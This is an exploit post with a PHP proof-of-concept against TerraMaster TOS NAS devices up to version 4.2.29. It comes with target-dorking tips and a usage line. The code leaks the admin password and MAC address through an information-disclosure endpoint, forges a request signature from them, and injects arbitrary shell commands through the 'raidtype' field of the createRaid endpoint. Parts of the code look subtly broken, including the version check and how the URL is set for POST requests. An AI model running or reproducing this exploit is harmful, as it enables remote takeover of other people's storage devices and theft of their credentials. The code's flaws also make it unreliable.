=============================================================================================================================================
| # Title : TerraMaster TOS 4.2.29 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.terra-master.com/global/alltos/ |
=============================================================================================================================================POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 138 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
class TerraMasterExploit
{
private $targetUri;
private $data = [];
private $terramaster = [];
public function __construct($targetUri)
{
$this->targetUri = rtrim($targetUri, '/') . '/';
}
public function getData()
{
// Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`
$response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);
if ($response && strpos($response, 'webNasIPS successful') !== false) {
// Parse the JSON response and get the data
$resJson = json_decode($response, true);
if (!empty($resJson['data'])) {
$this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);
$this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);
$this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries
$this->data['timestamp'] = time();
// derive signature
$this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);
}
}
}
private function tosEncryptStr($key, $strToEncrypt)
{
$id = $key . $strToEncrypt;
return md5($id);
}
public function executeCommand($cmd)
{
// Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`
$diskstring = $this->generateRandomString(4, 8);
$headers = [
'User-Agent' => 'TNAS',
'Authorization' => $this->data['password'],
'Signature' => $this->data['signature'],
'Timestamp' => $this->data['timestamp']
];
$this->sendRequest('POST', 'module/api.php?mobile/createRaid', [
'raidtype' => ';' . $cmd,
'diskstring' => $diskstring
], $headers);
}
public function getTerramasterInfo()
{
// get Terramaster CPU architecture and TOS version
$response = $this->sendRequest('GET', 'tos/index.php?user/login');
if ($response) {
preg_match('/ver=.+?"/', $response, $matches);
if ($matches) {
$version = $matches[0];
// check if architecture is ARM64 or X64
if (strpos($version, '_A') !== false) {
$this->terramaster['cpu_arch'] = 'ARM64';
} elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {
$this->terramaster['cpu_arch'] = 'X64';
} else {
$this->terramaster['cpu_arch'] = 'UNKNOWN';
}
// strip TOS version number and remove trailing double quote.
$this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');
}
}
}
public function check()
{
$this->getTerramasterInfo();
if (empty($this->terramaster)) {
return 'Safe';
}
if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {
return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
}
return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
}
public function exploit()
{
$this->getData();
if (empty($this->data)) {
throw new Exception('Cannot retrieve the leaked data.');
}
echo "Executing exploit...\n";
// Example command to execute
$this->executeCommand('whoami'); // Replace 'whoami' with desired command
}
private function sendRequest($method, $uri, $data = [], $headers = [])
{
$url = $this->targetUri . $uri;
$options = [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CUSTOMREQUEST => strtoupper($method),
CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)
];
if (strtoupper($method) === 'POST') {
$options[CURLOPT_POSTFIELDS] = http_build_query($data);
} else {
$options[CURLOPT_URL] = $url;
}
$ch = curl_init();
curl_setopt_array($ch, $options);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
private function generateRandomString($minLength, $maxLength)
{
$length = rand($minLength, $maxLength);
return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);
}
}
// Usage
$exploit = new TerraMasterExploit('http://target-terramaster-url.com');
$check = $exploit->check();
echo $check . "\n";
if (strpos($check, 'Vulnerable') !== false) {
$exploit->exploit();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================